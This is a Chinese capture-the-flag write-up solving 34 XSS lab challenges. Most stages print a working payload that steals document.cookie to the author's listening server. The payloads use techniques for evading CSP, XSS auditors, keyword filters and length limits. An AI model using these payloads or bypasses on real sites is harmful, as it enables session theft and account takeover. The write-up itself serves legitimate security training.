文章首发于先知社区https://xz.aliyun.com/t/4074
前言
做了一个xss平台的题目,一共34题,题目还不错,这里记录一下解题记录
题目地址:传送门
题目
这个平台接收flag的形式和其它平台不同,得用vps或者是用xss平台去接收cookie(flag在cookie中)
stage1
第一关它是告诉你你怎么去获取flag的
直接把你的payload在这里提交(记住一定是要在这个填入你的payload),然后用你的vps去接受flag就行了
payload1
http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?location=`http://134.175.33.164:1234/?${document.cookie}`
然后服务器端用nc监听接收flag1
nc -lvvkp 1234
可以看到成功接收到了flag
stage2
第二关直接可以嵌入js代码
payload1
http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>
data:image/s3,"s3://crabby-images/34f91/34f9141cab5315bd53a953aeb9bda6da0ba0e647" alt="image.png"
stage3
第三关q参数可控,直接闭合a标签
payload1
http://68e3b596ebf790e8a781b8d87b84af7eb7b0aeb3.knock.xss.moe/?q="><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>
data:image/s3,"s3://crabby-images/a23b0/a23b011ef9d7c00d43b7e491ce97e8989cef8101" alt="image.png"
stage4
和第三关同理,只不过把双引号变成了单引号
data:image/s3,"s3://crabby-images/cae26/cae26fc6e09f867268f68d577b3dffad2d288f9e" alt="image.png"
payload1
http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>
data:image/s3,"s3://crabby-images/33b41/33b41b37a3bab29e3b95482a6907968995bf53ed" alt="image.png"
stage5
直接闭合textarea标签
payload1
http://fea7c73bbe92f7880fc15514e076e838d2ce8a90.knock.xss.moe/?q=</textarea><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>
data:image/s3,"s3://crabby-images/edd6a/edd6a69e8c7af2dee19c8da822d119212ffebdf1" alt="image.png"
stage6
直接闭合xmp
payload1
http://d82fe27901fa05dcfa8980262fc811645543e374.knock.xss.moe/?q=</xmp><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>
data:image/s3,"s3://crabby-images/6120e/6120edc27a3a922f41be2f8ef568ef9f3c99b75f" alt="image.png"
stage7
第七关尖括号被转义了
data:image/s3,"s3://crabby-images/ab28e/ab28e7f525465aadc51d7567a7389e28f877b121" alt="image.png"
我们可以用onfocus事件,并且用它的autofocus属性去触发onfocus事件
payload1
http://8005f6694d2862438bad3715436522e27dbd81a4.knock.xss.moe/?q=XSS" autofocus onfocus="document.location=`http://134.175.33.164:1234/?${document.cookie}`
data:image/s3,"s3://crabby-images/89968/89968ad6b9f7c3e2b6fd211f543d32ec21a2c165" alt="image.png"
stage8
和第七关同理,只不过把双引号变成了单引号
payload1
http://b65797d44372ecb2b2552e32f10ec75f1bddcca6.knock.xss.moe/?q=xss' autofocus onfocus='document.location=`http://134.175.33.164:1234/?${document.cookie}`
data:image/s3,"s3://crabby-images/72a1e/72a1eca4859b2795a8fccadae8792ddd169e54f2" alt="image.png"
stage9
和第七关同理,但是没有引号
data:image/s3,"s3://crabby-images/3818e/3818e942c145b522323243f9dc33ffed7285f950" alt="image.png"
payload1
http://e461f5f6c542ae79ccc144093c63d0b074e591cd.knock.xss.moe/?q=XSS autofocus onfocus=document.location=`http://134.175.33.164:1234/?${document.cookie}`
data:image/s3,"s3://crabby-images/fd14f/fd14ffa189072ff3005be2563050f5471fa8b3bc" alt="image.png"
stage10
这题双引号被转义了,无法闭合双引号。所以我们可以考虑用javascript伪协议
data:image/s3,"s3://crabby-images/dd533/dd533dfa91e6768c156f565c9e077b9fb537bd37" alt="image.png"
1 | http://811fbf0db9c40565743a37c2978f812b82eb89a6.knock.xss.moe/?q=javascript:document.location=`http://134.175.33.164:1234/?${document.cookie}` |
data:image/s3,"s3://crabby-images/4a26a/4a26a83d05e49ad2daadb68fcf5dad051ee7c4c8" alt="image.png"
stage11
和stage10同理
data:image/s3,"s3://crabby-images/44c36/44c36e45812cfe3c464eb3e1ebb35d734059db0f" alt="image.png"
payload1
http://38e585f94f9d1f6bb79e88b74f3a5b5871d5bb84.knock.xss.moe/?q=javascript:document.location=`http://134.175.33.164:1234/?${document.cookie}`
data:image/s3,"s3://crabby-images/a75fe/a75fe21b770304afbbc645ee79accfe0a8bf746a" alt="image.png"
stage12
12关发现有CSP,只能默认同源下的资源加载,iframe标签也只能加载同源资源,但是有inline存在,所以我们可以用预加载Bypass掉CSP
尝试构造1
2
3
4var xss = document.createElement(`link`);
xss.setAttribute(`rel`, `prefetch`);
xss.setAttribute(`href`, `http://134.175.33.164:1234/?${document.cookie}`);
document.head.appendChild(xss);
最终payload1
2http://a4f51941335441be0fdb21c2890ec17b1d0f08f0.knock.xss.moe/?q=javascript:var xss = document.createElement(`link`);xss.setAttribute(`rel`, `prefetch`);xss.setAttribute(`href`, `http://134.175.33.164:1234/?${document.cookie}`);document.head.appendChild(xss);
//页面渲染完毕会创建 Link REL=prefetch 的标签,向目标页面发起预加载
data:image/s3,"s3://crabby-images/3be7b/3be7bbc956660fdb751f8e25fede060c3bf44040" alt="image.png"
stage13
十三关发现过滤了很多字符如window,document,cookie,img等字符,不过fuzz了一下发现svg可以用,其它的我们可以用base64编码绕过1
<svg onload=eval(atob("ZG9jdW1lbnQubG9jYXRpb249YGh0dHA6Ly8xMzQuMTc1LjMzLjE2NDoxMjM0Lz8ke2RvY3VtZW50LmNvb2tpZX1g"))>
data:image/s3,"s3://crabby-images/ba3d9/ba3d923b4527a7fece459b36b73bf1f95cd20f5e" alt="image.png"
stage14
14关又发现CSP
data:image/s3,"s3://crabby-images/87ded/87ded4893c2c08573799a56f4ab909b1f8ea36aa" alt="image.png"
但是和12关相比,它没有了unline,所以预加载的方法行不通了,但是我们可以看到这里1
frame-src http://*.knock.xss.moe
它允许knock.xss.moe的所有子域的资源可以被frame访问,那么问题来了,我们怎么样才可以用到knock.xss.moe子域的资源呢,灵机一动:既然是所有的子域,我们可利用其它关卡嘛
尝试构造1
http://3cb34c8407410e2d6c1d708b786ce69a0192b470.knock.xss.moe/?q=http://e461f5f6c542ae79ccc144093c63d0b074e591cd.knock.xss.moe/?q=XSS%20autofocus%20onfocus=alert(1);
发现可以执行
data:image/s3,"s3://crabby-images/049d2/049d2716c0a08ccfebf85a587fadf1ab6b84027e" alt="image.png"
然后我们再通过document.domain指定域,跨域获得flag(cookie)
最终payload:1
http://3cb34c8407410e2d6c1d708b786ce69a0192b470.knock.xss.moe/?q=http://e461f5f6c542ae79ccc144093c63d0b074e591cd.knock.xss.moe/?q=XSS%20autofocus%20onfocus=document.domain=`knock.xss.moe`;window.open(`http://134.175.33.164:1234/?${parent.document.cookie}`)
data:image/s3,"s3://crabby-images/b311a/b311ab1a407459bfb3a7d8c6893fd65f6b37b96f" alt="image.png"
stage15
直接用svg就OK了
payload1
http://e3bcee011cad77ba066ca7c2ad2884372aec9566.knock.xss.moe/?q=%3Csvg/onload=document.location=`http://134.175.33.164:1234/?${document.cookie}`%3E
data:image/s3,"s3://crabby-images/0f383/0f383d10d201273c2986c1d80b458baef81b21a0" alt="image.png"
stage16
16关是跳转到q参数所对应的网址
很容易想到用JavaScript伪协议
payload1
http://86620d66a1b474c588ef787b711b0f1d8843a1af.knock.xss.moe/?q=javascript:document.location=`http://134.175.33.164:1234/?${parent.document.cookie}`
data:image/s3,"s3://crabby-images/faa6f/faa6fff5088f31f3b0e522246872f5d2afc38de8" alt="image.png"
stage17
和stage16一样
data:image/s3,"s3://crabby-images/1e055/1e055702e4d4509189b78b373cdb170376b416a5" alt="image.png"
payload1
http://34a131df991487bf58d3df0a85e247d396fb93a0.knock.xss.moe/?q=javascript:document.location=`http://134.175.33.164:1234/?${parent.document.cookie}`
data:image/s3,"s3://crabby-images/4062b/4062bfe54a5de789bb62653987caf24d474d015c" alt="image.png"
stage18
data:image/s3,"s3://crabby-images/edf9e/edf9e986b04a4c5d5d0e430b5f6d69c351fcf0a2" alt="image.png"
尝试代码注入
data:image/s3,"s3://crabby-images/a2045/a2045f6d1cdfb49025386d090833f06bb737873a" alt="image.png"
发现给单引号前面加了一个\
,但是我们在单引号前面再加一个\
吃掉它
data:image/s3,"s3://crabby-images/6368f/6368ff640118869c2de210a482e0e658f626b877" alt="image.png"
最终payload1
http://c6a860d0948320766d5c4d8dc3bbdcdf9dd95884.knock.xss.moe/?q=1\');document.location=`http://134.175.33.164:1234/?${document.cookie}`;//
data:image/s3,"s3://crabby-images/2c8da/2c8dae374d3ce9b36b399faf12aab61d8c4ba6d1" alt="image.png"
stage19
data:image/s3,"s3://crabby-images/accd0/accd020de3a12f980a87b4ed78419b041791de5c" alt="image.png"
尝试代码注入
data:image/s3,"s3://crabby-images/02078/020784467f845695649de23b8b1f3d3cbb2c9509" alt="image.png"
但是我发现我用这个payload老是打不到cookie1
http://224d0c5677307d743ba90c8f81e42f5be648cd97.knock.xss.moe/?q=XSS%27);window.open(`http://134.175.33.164:1234/?${document.cookie}`);//
然后发现,必须要我把前面那个xss的弹窗点了之后后面的js代码才会触发,然而后台的bot并不会点击弹窗,所以才导致我们后面的代码不会执行,所以我们的利用点必须是在alert里面,尝试一波发现alert里面可以用其它函数,原因不明,有知道的师傅还请科普
最终payload1
http://224d0c5677307d743ba90c8f81e42f5be648cd97.knock.xss.moe/?q=XSS',window.open(`http://134.175.33.164:1234/?${document.cookie}`));//
data:image/s3,"s3://crabby-images/410c0/410c0155ba2d16f760d41133a3ad5420afa57979" alt="image.png"
stage20
发现script被替换为空,双写script即可绕过
payload1
http://303f34eb0a974a432254a4cb2d6e07fa6f8b0b7f.knock.xss.moe/?q=<scriscriptpt>document.location=`http://134.175.33.164:1234/?${document.cookie}`</scriscriptpt>
data:image/s3,"s3://crabby-images/6ac67/6ac67c5f5b5e28a96804b066af5ec9f3760d564e" alt="image.png"
stage21
和上一题差不多,只不过这题双写script没有用,但是我们可以用大小写绕过,但是发现无论怎么样都收不到cookie,查看一波响应头,发现
X-XSS-Protection:1;mode=block,这里使用了XSS过滤,如果检测到攻击,就会浏览器会阻止页面渲染
但是它会把script替换为空,所以我们可以利用script混淆代码,导致浏览器检测不出xss;
payload1
http://49ab9ff165cd76ffe06af0b72f450c82f35db396.knock.xss.moe/?q=<Script>docuscriptment.loscriptcation=`http://134.175.33.164:1234/?${document.cookie}`</sCript>
data:image/s3,"s3://crabby-images/39d33/39d33509ca8946d60caf6a2f6cce572c0b452511" alt="image.png"
stage22
22关发现有长度限制
发现最大长度是65
标签首先考虑用svg比较合适,然后用//
代替http://
,IP使用十进制ip
刚好65个踩点,最后payload1
http://bcd699e871d46c191f3c43a7197c18440b308507.knock.xss.moe/?q=<svg/onload=window.open(`//2259624356:1234/?${document.cookie}`)>
data:image/s3,"s3://crabby-images/a9386/a93864345eda8451919ea2c5badd39476c3c782c" alt="image.png"
stage23
这题限制55个字符
data:image/s3,"s3://crabby-images/11b20/11b203a45355049b60a2b9a5ba6b09d1c589b1a1" alt="image.png"
我们可以使用location.hash
,然后<svg/onload=eval(location.hash.slice(1))>
,最后在#
后面再加上我们的payload
data:image/s3,"s3://crabby-images/bb602/bb602a63e55e8f1b4fa942dbc2d70607baa2fa8a" alt="image.png"
长度41,没毛病
最终payload1
http://51b123fbd6a21b3cf43f49e0a1014221e191c7db.knock.xss.moe/?q=<svg/onload=eval(location.hash.slice(1))>#window.open(`http://134.175.33.164:1234/?${document.cookie}`)
data:image/s3,"s3://crabby-images/d95b7/d95b75e27ac59c573cd6d20f4bfa272544f49b36" alt="image.png"
stage24
这关限制字符45,但是stage23的payload仍然能用1
http://1498f071159fd60222c0e7e82b7b6ff046e9e52e.knock.xss.moe/?q=<svg/onload=eval(location.hash.slice(1))>#window.open(`http://134.175.33.164:1234/?${document.cookie}`)
data:image/s3,"s3://crabby-images/13e51/13e51bc5d4b3c9ae7557103fa8678a2fc58744ae" alt="image.png"
stage25
data:image/s3,"s3://crabby-images/6f9ff/6f9ff2dce4364a7490bbc71b1ce535e8e0864f48" alt="image.png"
这关限制35个字符,这还让不让人活了。这题前前后后搞了一小时,弄得我头皮发麻,无奈查了很多Short XSS,功夫不负有心人,发现了一片新天地
data:image/s3,"s3://crabby-images/55f90/55f90ece8fea7ae6db6d85f97228bb9f7afc3466" alt="image.png"
既然后台的bot是直接加载我们提交的URL,那么我们尝试在我们vps上部署以下代码1
2
3
4<script>
window.name = "location.href=`http://134.175.33.164:1234/?${parent.document.cookie}`";
location.href = "http://8e67e39d7e01213d5551c696ef8641b625cc8dd7.knock.xss.moe/?q=<svg/onload=eval(window.name)>";
</script>
然后把我的vps的链接直接提交过去
data:image/s3,"s3://crabby-images/4cc2b/4cc2bebf4f03f8ea92d9741cfa8cd1c7f810417d" alt="image.png"
Getflag
stage26
这题回把我们payload全部转化为大写,但是js中的函数是区分大小写的,但是我们可以用HTML实体编码绕过,然后再urlencode,不然浏览器会把#
后面当作描点
payload1
http://89078a2f1f0b7d9f210b1876f4b20ada0a090ebb.knock.xss.moe/?q=<img src="x" onerror=%26%23%78%37%37%3b%26%23%78%36%39%3b%26%23%78%36%65%3b%26%23%78%36%34%3b%26%23%78%36%66%3b%26%23%78%37%37%3b%26%23%78%32%65%3b%26%23%78%36%66%3b%26%23%78%37%30%3b%26%23%78%36%35%3b%26%23%78%36%65%3b%26%23%78%32%38%3b%26%23%78%36%30%3b%26%23%78%36%38%3b%26%23%78%37%34%3b%26%23%78%37%34%3b%26%23%78%37%30%3b%26%23%78%33%61%3b%26%23%78%32%66%3b%26%23%78%32%66%3b%26%23%78%33%31%3b%26%23%78%33%33%3b%26%23%78%33%34%3b%26%23%78%32%65%3b%26%23%78%33%31%3b%26%23%78%33%37%3b%26%23%78%33%35%3b%26%23%78%32%65%3b%26%23%78%33%33%3b%26%23%78%33%33%3b%26%23%78%32%65%3b%26%23%78%33%31%3b%26%23%78%33%36%3b%26%23%78%33%34%3b%26%23%78%33%61%3b%26%23%78%33%31%3b%26%23%78%33%32%3b%26%23%78%33%33%3b%26%23%78%33%34%3b%26%23%78%32%66%3b%26%23%78%33%66%3b%26%23%78%32%34%3b%26%23%78%37%62%3b%26%23%78%36%34%3b%26%23%78%36%66%3b%26%23%78%36%33%3b%26%23%78%37%35%3b%26%23%78%36%64%3b%26%23%78%36%35%3b%26%23%78%36%65%3b%26%23%78%37%34%3b%26%23%78%32%65%3b%26%23%78%36%33%3b%26%23%78%36%66%3b%26%23%78%36%66%3b%26%23%78%36%62%3b%26%23%78%36%39%3b%26%23%78%36%35%3b%26%23%78%37%64%3b%26%23%78%36%30%3b%26%23%78%32%39%3b>
data:image/s3,"s3://crabby-images/59314/5931443ad3323c23056281610924d93591af94f2" alt="image.png"
stage27
data:image/s3,"s3://crabby-images/8a443/8a443bbef142cbf8532029383b17b99b25b94654" alt="image.png"
这题把.
给过滤了,但是我们可以用数组的形式表示:window[‘open’],document[‘cookie’],
URL中的点的话,我们有两种方法,第一种方法是把ip地址转化为十进制ip地址,第二种方法是把url中的.
换成中文的句号,浏览器会把中文的句号自动转化成.
payload:1
2
3
4第一种:
http://295a1d900c5bf618101abf69083622d0f69aded1.knock.xss.moe/?q=<script>window['open'](`http://134。175。33。164:1234/?${document['cookie']}`)</script>
第二种:
http://295a1d900c5bf618101abf69083622d0f69aded1.knock.xss.moe/?q=<script>window['open'](`http://2259624356:1234/?${document['cookie']}`)</script>
data:image/s3,"s3://crabby-images/8267c/8267ce9eea4192779b0de0788606e5b1e4120e6f" alt="image.png"
stage28
这题比上一题多了一个过滤了双引号和单引号,但是我们可以用反引号绕过
payload1
http://02f6f47ddaa7b22137a74843f2c4f1ac915dda3b.knock.xss.moe/?q=<script>window[`open`](`http://2259624356:1234/?${document[`cookie`]}`)</script>
data:image/s3,"s3://crabby-images/bf0a0/bf0a04c886f41ba913fc1d7f5f5d2c9aaf35c32b" alt="image.png"
stage29
这题过滤了括号和.
,用document['location']
就ok了
payload1
http://a4bf8393a4159b94aa4b84e9a134d5e6140f3c34.knock.xss.moe/?q=document[`location`]=`http://2259624356:1234/?${document[`cookie`]}`
data:image/s3,"s3://crabby-images/bbefe/bbefef536e0c6900e45decb13685e5568005185e" alt="image.png"
stage30
和上一题一毛一样1
http://ebf510ac2d79576cd5b7d45412eaf3eed1781bd0.knock.xss.moe/?q=document[`location`]=`http://2259624356:1234/?${document[`cookie`]}`
data:image/s3,"s3://crabby-images/ca357/ca35701774cf5996c7e5fe9dcb06b2ea86c311b5" alt="image.png"
stage31-34(这四题一毛一样)
这题过滤了>
,但是没有过滤掉<
,但是<svg/onload=alert(1)
不需要闭合尖括号也可以执行
data:image/s3,"s3://crabby-images/2f44b/2f44b8471b6c3bf367ecbcaf6be246809aa1a952" alt="image.png"
payload1
http://bb84607f02113a22396438c9a67e4c5abdfd6561.knock.xss.moe/?q=%3Csvg/onload=document[`location`]=`http://2259624356:1234/?${document[`cookie`]}`//%3E
data:image/s3,"s3://crabby-images/1a3ff/1a3ff90ab764fff89581e1a9fd28e9c4d2fb2f92" alt="image.png"
总结
虽然这些题目并不是很难,但是套路还是很多的,学到了不少东西